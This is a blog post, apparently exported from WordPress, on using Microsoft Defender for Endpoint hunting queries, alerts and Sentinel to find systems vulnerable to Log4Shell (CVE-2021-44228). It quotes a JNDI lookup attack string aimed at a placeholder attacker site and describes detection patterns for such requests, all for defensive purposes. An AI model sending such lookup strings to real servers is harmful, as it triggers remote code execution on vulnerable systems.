{"id":4077,"date":"2021-12-15T00:31:25","date_gmt":"2021-12-14T22:31:25","guid":{"rendered":"https:\/\/jeffreyappel.nl\/?p=4077"},"modified":"2021-12-17T00:26:04","modified_gmt":"2021-12-16T22:26:04","slug":"microsoft-defender-for-endpoint-log4j","status":"publish","type":"post","link":"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/","title":{"rendered":"Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint for software\/ threat investigation"},"content":{"rendered":"
One of the most important and trending topics in the last couple of days is related to Log4j, log4shell, and the attached CVE 2021-44228. A zero-day vulnerability (CVE-2021-44228<\/a>), publicly released on 9 December 2021 and known as Log4j or Log4Shell, is actively being targeted in the wild. CVE-2021-44228 is assigned in the critical severity rating with a risk score of 10. With this high rating important to take immediate actions and patch vulnerable systems and software packages including Log4j.<\/strong><\/p>\r\n \u00a0Article updated 15 December 2021<\/strong><\/p>\r\n In this blog all the details about Log4J \/ CVE-2021-44228 detection with Microsoft Defender for Endpoint (MDE). Important to visit the Microsoft Security Response Center<\/a> blog. For reading all the detailed information and possible detection use-cases. See: Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j<\/a><\/p>\r\n The vulnerability CVE-2021-44228 referred to as Log4Shell affects Java-based applications that use Log4J 2 version 2.0 through 2.14.1. \u00a0Log4j 2<\/a> is a Java-based logging library that is widely used in the wild and included in open-source libraries and embedded in software applications. With this – the scope is high and includes thousands of software applications. Java is cross-platform and the Java library is used in many solutions. Important to track applications and patch directly to the latest security updates. Read the application vendor site for more details and available updates.<\/p>\r\n An example pattern of attack would appear in a web request log with strings like the following: ${jndi:ldap:\/\/[attacker site]\/a}<\/p>\r\n The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface.<\/p>\r\n This blog will focus mostly on the Defender for Endpoint (MDE) side and not technical in-depth on Log4j. Some recommended sources for more in-depth Log4j information:<\/p>\r\n Twitter<\/strong><\/p>\r\n The first step is getting insights into the application scope and affected software packages\/ devices. With the usage of Microsoft Defender for Endpoint (MDE), it is possible to use the vulnerability and software data based on Threat and Vulnerability Management (TVM).<\/p>\r\n For detecting systems with the Log4j components use the Software Inventory data and discover for the SoftwareName “log4j”. Log4j is the main component. Using Advanced Hunting is the most flexible way for building some more advanced queries and combinations:<\/p>\r\n Use the query for discovering where the software name contains Log4j<\/strong>.\u00a0<\/p>\r\n\r\n Which gives the result:\u00a0<\/p>\r\n <\/p>\r\n Software packages can contain the Log4J binary which is difficult to discover. Multiple applications are using the Log4J binary built-in. For resolving the CVE, the vendor must be release new patches.\u00a0<\/p>\r\n For example software like; iCloud client (patched), Splunk<\/a>, Vcenter<\/a>, Logstash<\/a> are vulnerable for some specific versions. View NCSC-NL Github<\/a> for additional software information for more applications and vendors.\u00a0<\/p>\r\n Microsoft is increasing TVM detection with more applications included.\u00a0Detection is possible based on the TVM data and CVE number. For detecting software follow the below steps:<\/p>\r\n Advanced hunting makes it easier to attach more combinations based on MDE data. Below basic query for CVE-2021-44228 detection.\u00a0<\/p>\r\n\r\n Which gives the result:\u00a0<\/p>\r\n And applications used which not patched against CVE-2021-44228:\u00a0<\/p>\r\n <\/p>\r\n Microsoft published the Threat analytics reports inside Microsoft Defender for Endpoint. The analytics report provides information in multiple tabs. For viewing the MDE analytics report:<\/p>\r\n Based on the threat analytics details the related incidents are visible, impacted assets, and more technical details. The page contains the following details:<\/p>\r\n <\/p>\r\n Contains all incidents which are related to the Log4j active exploitation:<\/p>\r\n Mitigations contain software packages that are vulnerable and detected by Microsoft. Part of the current CVE detection for example:<\/p>\r\n An attacker performs an HTTP request against their target system which generates a log using Log4j that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability will then cause the exploited process to reach out to the site and execute the payload.<\/p>\r\n Important:<\/strong> attackers have added obfuscation to these requests witch make various combinations possible – for trying to bypass detections based on the request patterns the following combinations are possible with lower or upper commands.\u00a0<\/p>\r\n For tracking the process commands below Advanced Hunings queries are useful:\u00a0<\/p>\r\n Important:<\/strong> DeviceProcessEvents will not detect all of them<\/p>\r\n Below Advanced Hunting query shows the ProcessCommandLine for all events which contain jndi and has any of ldap, ldaps, HTTP, rmi, dns, iiop<\/p>\r\n <\/p>\r\n Recommended to use one of the available IOCs lists and match the IOC based on the DeviceNetworkEvents data in MDE. View NCSC-NL GitHub<\/a> for available IOCs data sources.\u00a0<\/p>\r\n More Advanced Hunting queries examples<\/p>\r\n Defender built some built-in detection rules which can trigger the following alerts, and can indicate threat activity:<\/p>\r\n In case of possible Log4j exploitation below information is visible directly in MDE. Important to track the alerts with the title: Possible Log4j exploitation<\/p>\r\n incident overview in MDE:\u00a0<\/strong>Detected by detection source: EDR<\/p>\r\n Alert story: <\/strong>Contains the jndi:ldap:\/\/ command and detects possible Log4j exploitation.<\/p>\r\n In case when Microsoft Sentinel is connected with MDE the following events will be visible. A new blog is coming with more focus on Microsoft Sentinel and the detection options with Sentinel.<\/p>\r\n For the Microsoft Sentinel data connection make sure the Defender connector is enabled. Enable one of the below data connections and enable automatic alert creation.\u00a0<\/p>\r\n During the enablement of the connector –\u00a0 there is a checkbox for enabling Microsoft Defender for Endpoint alerts:<\/p>\r\n Defender for Endpoint connector:<\/strong><\/p>\r\n Microsoft 365 preview connector:<\/strong> Apply these mitigations to reduce the impact:<\/p>\r\n Log4j components<\/strong><\/p>\r\n OS<\/strong><\/p>\r\n Defender for Endpoint<\/strong><\/p>\r\n Important:<\/strong> Not all mitigations are listed. Read all the recommendations by Microsoft and other security vendors for the complete list of mitigations.\u00a0<\/p>\r\n Don’t forget to read all the recommendations by Microsoft and other security vendors for mitigations, protections, and detections rules. This blog contains only the first parts based on Microsoft Defender for Endpoint and some of the functions which can help with the detection of Log4J with existing device data.\u00a0<\/p>","protected":false},"excerpt":{"rendered":" One of the most important and trending topics in the last couple of days is related to Log4j, log4shell, and the attached CVE 2021-44228. A zero-day vulnerability (CVE-2021-44228), publicly released on 9 December 2021 and known as Log4j or Log4Shell,…<\/p>\n","protected":false},"author":1,"featured_media":4095,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[189],"tags":[219],"table_tags":[],"yoast_head":"\nWhy is Log4J, log4shell, CVE-2021-44228 important?<\/h2>\r\n
\r\n
\r\n
\r\nGet software TVM insights with Microsoft Defender for Endpoint<\/h2>\r\n
Detect systems with Log4j installed<\/h3>\r\n
\/\/Vulnerable software on endpoints\r\nDeviceTvmSoftwareInventory\r\n| where SoftwareName contains \"Log4j\"\r\n| project DeviceName, SoftwareName, SoftwareVersion<\/code><\/pre>\r\n\r\n
<\/p>\r\n
Detect software including Log4j and single Log4j packages<\/h3>\r\n
\r\n
<\/p>\r\n
Advanced Hunting<\/strong><\/h3>\r\n
\/\/Vulnerable software on endpoints\r\nDeviceTvmSoftwareVulnerabilities\r\n| where CveId contains \"CVE-2021-44228\"\r\n| distinct DeviceName, OSPlatform, SoftwareVendor, SoftwareName, SoftwareVersion, RecommendedSecurityUpdate, RecommendedSecurityUpdateId<\/code><\/pre>\r\n\r\n
<\/p>\r\n
<\/p>\r\n
\r\nMicrosoft defender for Endpoint Threat Analytics report<\/strong><\/h2>\r\n
\r\n
<\/p>\r\n
<\/p>\r\n
\r\n
Related incidents<\/h3>\r\n
<\/p>\r\n
Mitigations<\/h3>\r\n
\r\n
<\/p>\r\n
\r\nProcess commands in Defender for Endpoint<\/h2>\r\n
\r\n
Detect Process events<\/strong><\/h3>\r\n
<\/p>\r\n
IOC matching<\/h3>\r\n
\r\n
\r\nDefender for Endpoint alerts<\/strong><\/h2>\r\n
\r\n
Alert: Possible Log4j exploitation alert<\/strong><\/h3>\r\n
<\/p>\r\n
<\/p>\r\n
\r\nMicrosoft Sentinel<\/h3>\r\n
<\/p>\r\n
\r\n
<\/p>\r\n
<\/p>\r\n
<\/p>\r\n
\r\nMitigations<\/h2>\r\n
\r\n
\r\n
\r\n
\r\nConclusion<\/h2>\r\n